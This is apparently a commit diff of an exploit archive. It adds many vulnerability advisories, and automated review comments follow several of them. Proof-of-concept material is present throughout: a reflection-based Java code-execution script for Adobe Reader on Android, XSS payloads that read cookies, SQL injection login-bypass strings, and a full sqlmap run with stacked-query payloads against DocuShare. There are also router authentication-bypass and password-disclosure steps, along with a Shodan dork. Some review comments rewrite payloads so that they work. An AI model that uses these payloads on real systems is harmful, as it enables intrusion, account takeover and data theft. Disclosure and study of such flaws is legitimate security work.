this.mWebView.addJavascriptInterface(new
ARJavaScriptInterface(this),
"_adobereader");
this.mWebView.addJavascriptInterface(new
ARJavaScriptApp(this.mContext), "_app");
this.mWebView.addJavascriptInterface(new ARJavaScriptDoc(),
"_doc");
this.mWebView.addJavascriptInterface(new
ARJavaScriptEScriptString(this.mContext), "_escriptString");
this.mWebView.addJavascriptInterface(new ARJavaScriptEvent(),
"_event");
this.mWebView.addJavascriptInterface(new ARJavaScriptField(),
"_field");
this.mWebView.setWebViewClient(new ARJavaScript.1(this));
this.mWebView.loadUrl("file:///android_asset/javascript/index.html");
}
An attacker can create a specially crafted PDF file containing
Javascript that runs when the target user views (or interacts with)
this PDF file. Using any of the Javascript objects listed above
provides the attacker access to the public Reflection APIs inherited
from Object. These APIs can be abused to run arbitrary Java code.
------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
The following proof of concept [5] will create a text file in the app
sandbox.
function execute(bridge, cmd) {
return bridge.getClass().forName('java.lang.Runtime')
.getMethod('getRuntime',null).invoke(null,null).exec(cmd);
}
if(window._app) {
try {
var path = '/data/data/com.adobe.reader/mobilereader.poc.txt';
execute(window._app, ['/system/bin/sh','-c','echo \"Lorem
ipsum\" > '
+ path]);
window._app.alert(path + ' created', 3);
} catch(e) {
window._app.alert(e, 0);
}
}
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
http://www.securify.nl/advisory/SFY20140401/adobe_reader_for_android_exposes_insecure_javascript_interfaces.html
[2] https://play.google.com/store/apps/details?id=com.adobe.reader
[3]
http://developer.android.com/reference/android/webkit/JavascriptInterface.html
[4]
http://www.adobe.com/devnet-docs/acrobatetk/tools/Mobile/js.html#supported-javascript-apis
[5] http://www.securify.nl/advisory/SFY20140401/mobilereader.poc.pdf
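Review bot: The Fix section describes the 11.2.0 mitigation (`@JavascriptInterface` annotations plus targeting API Level 17) without stating the limit that presumably motivated the `shouldInitializeJavaScript()` version check it also mentions: WebView only honours the annotation-based restriction when the app targets API 17 and the device itself runs Android 4.2 or later, so on older devices every public method of a bridged object stays reachable regardless of the annotations. A sentence such as `Note that the annotation restriction is enforced only on Android 4.2+; on older devices the added version check is what prevents the interfaces from being registered` would let readers judge whether the update actually closes the issue for their devices. Relatedly, the Tested versions section records only the Reader version, not the Android release of the test device; since exposure depends on both the app's target API level and the platform version, the device OS version should be noted alongside 11.1.3.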


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/33957/info
Blogsa is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Blogsa 1.0 Beta 3 is vulnerable; other versions may also be affected.
http://www.example.com/Widgets.aspx?w=Search&p=do&searchText=<script>alert(document.cookie)</script>


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34227/info
BlogEngine.NET is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
BlogEngine.NET 1.4 is vulnerable; other versions may also be affected.
http://www.example.com/blog/search.aspx?q="><script>alert(&#039;ImBeded%20JS&#039;)</script>
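Review bot: The PoC URL on the last line encodes the apostrophes as HTML entities (`&#039;`), which will not execute once the payload lands inside the injected `<script>` element, because browsers do not entity-decode script content. The advisory should give the raw form, `search.aspx?q="><script>alert(%27ImBeded%20JS%27)</script>`, or simply `alert(1)`. The entities look like an artifact of copying the payload out of an HTML-rendered BID page rather than the request that was actually sent.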


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34341/info
SAP Business Objects Crystal Reports is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
NOTE: This issue may be related to the one described in BID 12107 (Business Objects Crystal Enterprise Report File Cross-Site Scripting Vulnerability). We will update or retire this BID when more information emerges.
https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect
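Review bot: The PoC injects `%0d%0a` followed by `window.alert%20"..."` into the `url` parameter of `viewreport.asp`, which reads like a line break into a script context (the space-separated `window.alert "..."` is VBScript-style) rather than plain HTML reflection, but the advisory never says where `url` is echoed; one sentence on the output context would make the `fsck_cissp^^INIT=actx:connect` tail intelligible to a reader. Unlike the neighbouring advisories, no affected version is listed, only the cross-reference to BID 12107.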

13
platforms/asp/webapps/32888.txt Executable file

@ -0,0 +1,13 @@
source: http://www.securityfocus.com/bid/34349/info
Asbru Web Content Management is prone to multiple SQL-injection vulnerabilities and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Asbru Web Content Management 6.5 and 6.6.9 are vulnerable; other versions may also be affected.
http://www.example.com/page.asp?id=1
http://www.example.com/page.asp?id=1 AND 1=2
http://www.example.com/page.asp?id=1 AND 1=1
http://www.example.com/webadmin/login.asp?url="><script>alert(document.cookie)</script>
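Review bot: The three `page.asp?id=1` requests are a boolean detection pair rather than an exploit, and the advisory does not say what difference in the `AND 1=2` response confirms the injection; one sentence on the observable difference (blank page, error, missing content) would make the finding verifiable. The XSS via `webadmin/login.asp?url=` sits on the administrative login page, so the likely victim is an administrator, which is worth stating since it raises the impact of the cookie theft described above.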

11
platforms/asp/webapps/32898.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34463/info
Absolute Form Processor XE is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Absolute Form Processor XE 1.5 is vulnerable; other versions may also be affected.
The following example input is available:
username: ' or '1=1
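Review bot: The payload `' or '1=1` closes the original quote and leaves `1=1` as a trailing string literal (`... OR '1=1'`), which is only truthy on a DBMS that coerces strings to numbers such as MySQL; on SQL Server, which an ASP product plausibly uses, a bare string in a WHERE clause is a syntax error. The portable form is `' or '1'='1`. Whether the login accepts either depends on how the query is built, which the advisory does not show, so stating the backend and the observed result (logged in as which user) would help.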


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/34491/info
People-Trak is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
The following example data is available:
username: ' or 1=(Select top 1 WAM_UserID from WebAppMgrs)--
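Review bot: The payload `' or 1=(Select top 1 WAM_UserID from WebAppMgrs)--` relies on SQL Server syntax (`TOP 1`, `--` comment) and on prior knowledge of the `WebAppMgrs`/`WAM_UserID` schema, neither of which the advisory states; naming the backend would save readers a guess. What the comparison achieves is also left unexplained, presumably a login as the first manager row, so one sentence on the resulting access would clarify impact. No affected version is listed, unlike the neighbouring advisories.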

12
platforms/cgi/webapps/32870.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/34159/info
AWStats is prone to a path-disclosure vulnerability.
Exploiting this issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer.
The following are vulnerable:
AWStats 6.5 (build 1.857) and prior
WebGUI Runtime Environment 0.8.x and prior
http://www.example.com/awstats/awstats.pl?config=HACKdestailleur.fr

11
platforms/cgi/webapps/32907.txt Executable file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/34507/info
Banshee DAAP Extension is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
DAAP Extension for Banshee 1.4.2 is vulnerable; other versions may also be affected.
The following example URI is available:
http://www.example.com:8089/[xss-here]
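Review bot: The PoC `http://www.example.com:8089/[xss-here]` is a placeholder rather than a reproducible request, so the advisory does not show which response reflects the path or what encoding survives. A minimal concrete probe would be `http://www.example.com:8089/<script>alert(1)</script>`, with the reflecting context named (presumably an error or listing page produced by the DAAP extension, which the text does not confirm). It is also worth noting that the DAAP listener is normally only reachable on the local network, which constrains who can deliver the link.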


@ -0,0 +1,26 @@
source: http://www.securityfocus.com/bid/34307/info
Cisco ASA is prone to a cross-site scripting vulnerability.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to steal cookie-based authentication credentials.
Cisco ASA software versions 8.0.4(2B) and prior running on ASA 5500 Series Adaptive Security Appliances are vulnerable.
POST /+webvpn+/index.html HTTP/1.1
Host: "'><script>alert('BugsNotHugs')</script><meta httpequiv=""
content='"www.example.org
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: https://www.example.com/+webvpn+/index.html
Accept-Language: en-us
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/1.3 (compatible; MSIE 3.0; Windows 3.11; .NET CLR 1.1.1032)
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: webvpnlogin=1
Content-Length: 66
username=psirt&password=easy&Login=Login&next=&tgroup=&tgcookieset=
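Review bot: The injection point in this PoC is the `Host` request header (`Host: "'><script>alert('BugsNotHugs')</script>...`), which a victim's browser will not let an attacker control, so exploitation against another user needs an intermediary such as a proxy, cache or on-path position rather than a crafted link; the advisory should state that delivery constraint. The `<meta httpequiv=""` fragment is also missing the hyphen (`http-equiv`), though it is only filler here. `Content-Length: 66` appears to be one byte short of the 67-byte form body shown, which may be a transcription slip worth re-checking.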


@ -0,0 +1,32 @@
# Title : Sagem F@st 3304-V2 Authentification Bypass
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested on : Firefox, Google Chrome, Internet Explorer
# Tested Router : Sagem F@st 3304-V2 (3304, 3464, 3504 may also be affected)
# Date : 2014-09-04
# Author : Yassine Aboukir
# Contact : Yaaboukir@gmail.com
# Blog : http://linkedin.com/pub/yassine-aboukir/43/900/1b3
-----------
# Vulnerability description: : Sagem Fast is an ADSL Router using a web management interface in order to change configuration settings. The router is vulnerable to an authentification bypass bug which allows unprivileged users to modify the preconfigured root password then log in with administrator permissions.
The default URL to access to the web management interface is http://192.168.1.1 but this attack can also be performed by an axternal attacker who connects to the router's public IP address.
# Exploit :
The vulnerability can be exploited by running javascript code in the web browser bar which allows to access password change page without having permession to do so.
--- Using Chrome, Internet Explorer browser :
You first need to access the router login page http://192.168.1.1/(without loging in)
Then execute the following javascript in the URL bar : javascript:mimic_button('goto: 9096..')
--- Using Firefox :
Because running javascript in the url bar has been disabled in Mozilla Firefox, we will try another way :
You first need to access the router login page http://192.168.1.1/(without loging in)
1st Method :
You have to bookmark the javascript: link before it can be executed.
---- Show all Bookmarks (Ctrl+Shift+B)
---- Select folder (e.g. Bookmarks Toolbar)
---- Click Organize-> New bookmark .. and enter javascript:mimic_button('goto: 9096..') in the address field.
2nd Method :
The web console tool (CTRL + SHIFT + K), in which you can interpret javascript expressions in real time using the command line provided by the Web Console.
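Review bot: The `# Date : 2014-09-04` header is later than this commit (April 2014), so month and day are likely transposed and should read `2014-04-09`. The exploit depends on the login page exposing `mimic_button('goto: 9096..')`, which suggests the underlying defect is that page 9096 (the password-change form) is served without a session check; the advisory would be stronger if it said so explicitly and showed the resulting request and response. The claim that the attack also works against the router's public IP only holds if remote management is enabled on the WAN side, which the text does not establish.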


@ -0,0 +1,105 @@
Title: Multiple vulnerabilities in NETGEAR N600 WIRELESS DUAL BAND WNDR3400
====================================================================================
Notification Date: 4/14/2014
Affected Vendor: NETGEAR N600 WIRELESS DUAL BAND WNDR3400
Firmware Version: Firmware Version 1.0.0.38 AND BELOW (ALL versions affected)
Issue Types: password Disclosure File Uploading with AuthPPOPE settings Change
Discovered by: Santhosh Kumar twitter: @security_b0x
Issue status: No Patch >From the Vendors.
grettings: @Anami2111 (anamika singh) -- creator of wihawk
====================================================================================
Summary:
========
While i was lurking around the Netgear firmware today i came across various tweaking and others i was able to find a password disclosure,File uploading vulnerably which could compromise the entire router.as of now no patch from the vendor.
Password Disclosure:
====================
url: server/unauth.cgi?id=393087602
Generating with the 401 unauthorised error
poc:
Host: server:8080
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://server:8080/
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 0<p class="MNUTitle">Router Password Recovered</p>
<table border="0" cellpadding="0" cellspacing="3" style="width:600px">
<col width="200" />
<col width="400" />
<tr>
<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">password</td>
</tr>
\<tr>
poc2:
server:8080/passwordrecovered.cgi?id=1738955828
<tr>
<td colspan="2" class="MNUText">You have successfully recovered the admin password.</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Username</td>
<td class="MNUText" align="left">admin</td>
</tr>
<tr>
<td class="MNUText" align="right">Router Admin Password</td>
<td class="MNUText" align="left">0514</td>
</tr>
<tr>
<td colspan="2" class="MNUText">You can now log in to the router using username "admin" and this recovered password.</td>
</tr>
<tr>
==============================================================================================================================
Ppope account reset:
Netgear runs a utility called "netgear genie" which does not have proper authentication on reaching "genie_pppoe.htm "
which allows to reset the ppoe username which any basic authentication.
http://server/genie_pppoe.htm
==============================================================================================================================
File Upload (router reset):
like the same one above the "http://server/genie_restore.htm"
the config file can be uploaded which leading to reseting the control to attackers username and password.
*.cfg file.
==============================================================================================================================
SHODAN DORK:
wndr3400: 10198 for wndr3400
******************************************************************************************************************************
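Review bot: The password-disclosure PoC is the most serious finding, but it never explains where the `id` value in `unauth.cgi?id=393087602` and `passwordrecovered.cgi?id=1738955828` comes from or why two different values both work; a reader needs to know whether the id is taken from the 401 page, is guessable, or is ignored by the CGI. The first PoC also runs the request headers and the response HTML together on the `Content-Length: 0<p class="MNUTitle">` line, which should be split into request and response. `Ppope`/`ppoe` in the PPPoE section are typos for PPPoE, and the `genie_pppoe.htm` and `genie_restore.htm` findings would benefit from a captured request demonstrating the missing authentication.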


@ -0,0 +1,127 @@
The following request is vulnerable to a SQL injection in the last URI segment:
GET /docushare/dsweb/ResultBackgroundJobMultiple/1 HTTP/1.1
Host: 172.31.16.194:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:26.0) Gecko/20100101 Firefox/26.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://172.31.16.194:8080/docushare/dsweb/DeleteConfirmation/1/Collection-14/Services
Cookie: JSESSIONID=AB82A86859D9C65475DDE5E47216F1A0.tomcat1; AmberUser=64.980A91BBF9D661CB800C2CE5FCCE924AEF4D51CF0280B319873BC31AF0705F0F21.1svt4r2doj13hhu1dc7kf
Connection: keep-alive
Response (goodies):
<div id="error_vdftitle">
<h2><font color="#DD3333">System Error </font></h2>
</div>
<div id="content">
<form name="ERROR" method="post" action="/docushare/dsweb/ApplyError">
<table cellpadding="1" cellspacing="1">
<tr><td><b>Error Code: 1501</b></td></tr>
<tr><td><b><i>SQL error.</i></b></td></tr>
</table>
<input type="hidden" name="dsexception" value="yes" />
<input type="hidden" name="dserrorcode" value="1501" />
<input type="hidden" name="detail_message" value="SQL error." />
<br />
<input type="hidden" name="message" value="Error doing the getBackgroundJobInfo query; nested exception is:
org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near &#34;&#39;1&#34;
Error doing the getBackgroundJobInfo query; nested exception is:
org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near &#34;&#39;1&#34;
" />
<input type="hidden" name="stacktrace" value="com.xerox.docushare.db.DatabaseException: Error doing the getBackgroundJobInfo query; nested exception is:
org.postgresql.util.PSQLException: ERROR: unterminated quoted string at or near &#34;&#39;1&#34;
at com.xerox.docushare.db.jdbc.DbConnectionJDBC.getBackgroundJobInfo(DbConnectionJDBC.java:18440)
at com.xerox.docushare.impl.server.BackendSessionImpl.getBackgroundJobInfo(BackendSessionImpl.java:13022)
at sun.reflect.GeneratedMethodAccessor59.invoke(Unknown Source)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:25)
at java.lang.reflect.Method.invoke(Method.java:597)
at sun.rmi.server.UnicastServerRef.dispatch(UnicastServerRef.java:305)
at sun.rmi.transport.Transport$1.run(Transport.java:159)
at java.security.AccessController.doPrivileged(Native Method)
at sun.rmi.transport.Transport.serviceCall(Transport.java:155)
at sun.rmi.transport.tcp.TCPTransport.handleMessages(TCPTransport.java:535)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run0(TCPTransport.java:790)
at sun.rmi.transport.tcp.TCPTransport$ConnectionHandler.run(TCPTransport.java:649)
at java.util.concurrent.ThreadPoolExecutor$Worker.runTask(ThreadPoolExecutor.java:886)
at java.util.concurrent.ThreadPoolExecutor$Worker.run(ThreadPoolExecutor.java:908)
at java.lang.Thread.run(Thread.java:662)
" />
<input type="hidden" name="redirectTo" value="SystemError" />
---------------------------------------
quick sqlmap run:
bperry@ubuntu:~/tools/sqlmap$ ./sqlmap.py -r /tmp/req.req --level=5 --risk=3 -o --dbms=postgres
sqlmap/1.0-dev-e8c1c90 - automatic SQL injection and database takeover tool
http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 09:28:49
[09:28:49] [INFO] parsing HTTP request from '/tmp/req.req'
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q]
[09:28:50] [INFO] testing connection to the target URL
[09:28:51] [INFO] testing NULL connection to the target URL
[09:28:51] [INFO] testing if the target URL is stable. This can take a couple of seconds
[09:28:52] [INFO] target URL is stable
[09:28:52] [INFO] testing if URI parameter '#1*' is dynamic
[09:28:52] [INFO] confirming that URI parameter '#1*' is dynamic
[09:28:52] [WARNING] URI parameter '#1*' does not appear dynamic
[09:28:52] [INFO] testing for SQL injection on URI parameter '#1*'
[09:28:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[09:28:52] [WARNING] reflective value(s) found and filtering out
[09:28:53] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[09:28:53] [INFO] URI parameter '#1*' is 'PostgreSQL AND error-based - WHERE or HAVING clause' injectable
[09:28:53] [INFO] testing 'PostgreSQL inline queries'
[09:28:53] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[09:28:53] [WARNING] time-based comparison requires larger statistical model, please wait........
[09:29:04] [INFO] URI parameter '#1*' seems to be 'PostgreSQL > 8.1 stacked queries' injectable
[09:29:04] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[09:29:14] [INFO] URI parameter '#1*' seems to be 'PostgreSQL > 8.1 AND time-based blind' injectable
[09:29:14] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[09:29:14] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[09:29:14] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[09:29:14] [INFO] target URL appears to have 10 columns in query
injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n]
[09:29:31] [INFO] testing 'Generic UNION query (49) - 22 to 40 columns'
[09:29:33] [INFO] testing 'Generic UNION query (49) - 42 to 60 columns'
[09:29:34] [INFO] testing 'Generic UNION query (49) - 62 to 80 columns'
[09:29:36] [INFO] testing 'Generic UNION query (49) - 82 to 100 columns'
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 155 HTTP(s) requests:
---
Place: URI
Parameter: #1*
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 6164=6164
Type: error-based
Title: PostgreSQL AND error-based - WHERE or HAVING clause
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 7298=CAST((CHR(113)||CHR(113)||CHR(108)||CHR(115)||CHR(113))||(SELECT (CASE WHEN (7298=7298) THEN 1 ELSE 0 END))::text||(CHR(113)||CHR(120)||CHR(109)||CHR(121)||CHR(113)) AS NUMERIC)
Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1; SELECT PG_SLEEP(5)--
Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: http://172.31.16.194:8080/docushare/dsweb/ResultBackgroundJobMultiple/1 AND 3994=(SELECT 3994 FROM PG_SLEEP(5))
---
[09:30:04] [INFO] the back-end DBMS is PostgreSQL
back-end DBMS: PostgreSQL
[09:30:04] [INFO] fetched data logged to text files under '/home/bperry/tools/sqlmap/output/172.31.16.194'
[*] shutting down at 09:30:04
bperry@ubuntu:~/tools/sqlmap$
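Review bot: The request shown (`GET /docushare/dsweb/ResultBackgroundJobMultiple/1`) cannot by itself produce the `unterminated quoted string at or near "'1"` error in the response, so the actual probe presumably appended a quote (`/1'`); the advisory should show the exact injected request. The capture also carries `JSESSIONID` and `AmberUser` cookies, which suggests the endpoint was tested with an authenticated session, and it should state whether an unauthenticated user reaches the same `getBackgroundJobInfo` query. Since sqlmap reports stacked queries as injectable on PostgreSQL, the impact is execution of arbitrary SQL statements rather than data read alone, which the opening line should say.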

269
platforms/ios/webapps/32866.txt Executable file

@ -0,0 +1,269 @@
Document Title:
===============
PDF Album v1.7 iOS - File Include Web Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1255
Release Date:
=============
2014-04-11
Vulnerability Laboratory ID (VL-ID):
====================================
1255
Common Vulnerability Scoring System:
====================================
7.3
Product & Service Introduction:
===============================
Here is a creative way to record an idea, a page in a book or newspapers, what you learned, even a travel memory. You can get content from camera,
image or text editor, then pick them up into a pdf file and compose them as you wish. You can order the pages in project, then save the project
and open it again when you want to add or change it. You can get pdfs via WIFI or read them in this app.
(Copy of the Homepage: https://itunes.apple.com/ch/app/pdf-album/id590232990 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include web vulnerability in the official PDF Album v1.7 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-04-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Lintao Zhao
Product: PDF Album - iOS Mobile Application 1.7
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official PDF Album v1.7 iOS mobile web-application. The local file include
web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path commands to compromise
the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs
in the `pdf album index item` list context. The attacker can inject the local file include request by usage of the `wifi interface` or by a local
privileged application user account via `folder sync`.
Attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute different
local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to inject is POST. The security
risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST] - Remote
[+] [SYNC] - Local
Vulnerable Module(s):
[+] Browse File > Upload
Vulnerable Parameter(s):
[+] filename.*.pdf
Affected Module(s):
[+] PDF Album - Index Item Listing (http://localhost:8808/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by local attackers with low privileged user account without required user interaction.
For security demonstration or to reproduce the local file include vulnerability follow the provided information and steps below to continue.
PoC: Exploit Code
<table cellpadding="0" cellspacing="0" border="0">
<thead>
<tr><th>Name</th><th class="del">Delete</th></tr></thead>
<tbody id="filelist">
<tr><td><a href="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" class="file">
>"<./[LOCAL FILE INCLUDE VULNERABILITY VIA PDF ALBUMNAME!">.pdf</a></td><td class='del'>
<form action='/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf' method='post'><input name='_method' value='delete' type='hidden'/>
<input name="commit" type="submit" value="Delete" class='button' /></td></tr></tbody></table></iframe></a></td></tr>
<tr class="shadow"><td><a href="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf"
class="file">%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf</a></td><td class="del">
<form action="/files/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY VIA FILENAME!]%3E.pdf" method="post">
<input name="_method" value="delete" type="hidden"><input name="commit" value="Delete" class="button" type="submit"></form></td></tr></tbody></table>
PoC: Vulnerable Source
<script type="text/javascript" charset="utf-8">
var now = new Date();
$.getJSON("/files?"+ now.toString(),
function(data){
var shadow = false;
$.each(data, function(i,item){
var trclass='';
if (shadow)
trclass= " class='shadow'";
encodeName = encodeURI(item.name).replace("'", "'");
$("<tr" + trclass + "><td><a href='/files/" + encodeName + "' class='file'>" + item.name + "</a></td>" + "<td class='del'><form action='/files/" + encodeName + "' method='post'><input name='_method' value='delete' type='hidden'/><input name=\"commit\" type=\"submit\" value=\"Delete\" class='button' /></td>" + "</tr>").appendTo("#filelist");
shadow = !shadow;
});
});
</script>
PoC Link:
http://localhost:8808/files/%3E%22%3C[FILE INCLUDE VULNERABILITY!]%3E.pdf
--- PoC Session Logs [POST] ---
Injection via Wifi UI > Upload (iChm File Management)
14:44:34.743[170ms][total 170ms] Status: 302[Found]
POST http://192.168.2.104:8808/files Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[67] Mime Type[text/html]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8808/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------1145570518587
Content-Disposition: form-data; name="newfile"; filename="%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Note: A local injection by usage of the app album name value is also possible via regular sync!
--- PoC Session Logs [GET] ---
Execution PDF Album (iChm File Management)
14:43:20.010[836ms][total 1106ms] Status: 200[OK]
GET http://192.168.2.104:8808/ Load Flags[VALIDATE_ALWAYS LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[2773] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[2773]
Date[Do., 10 Apr. 2014 12:54:15 GMT]
14:43:20.874[48ms][total 48ms] Status: 200[OK]
GET http://192.168.2.104:8808/jquery.js Load Flags[VALIDATE_ALWAYS ] Gr??e des Inhalts[55774] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[*/*]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8808/]
Connection[keep-alive]
Cache-Control[max-age=0]
Response Header:
Accept-Ranges[bytes]
Content-Length[55774]
Date[Do., 10 Apr. 2014 12:54:15 GMT]
14:43:21.062[41ms][total 41ms] Status: 200[OK]
GET http://192.168.2.104:8808/%3E%22%3C./[LOCAL FILE INCLUDE VULNERABILITY!].*; Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[application/x-unknown-content-type]
Request Header:
Host[192.168.2.104:8808]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://192.168.2.104:8808/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[0]
Date[Do., 10 Apr. 2014 12:54:15 GMT]
Reference(s):
http://localhost:8808/files/
http://localhost:8808/
Solution - Fix & Patch:
=======================
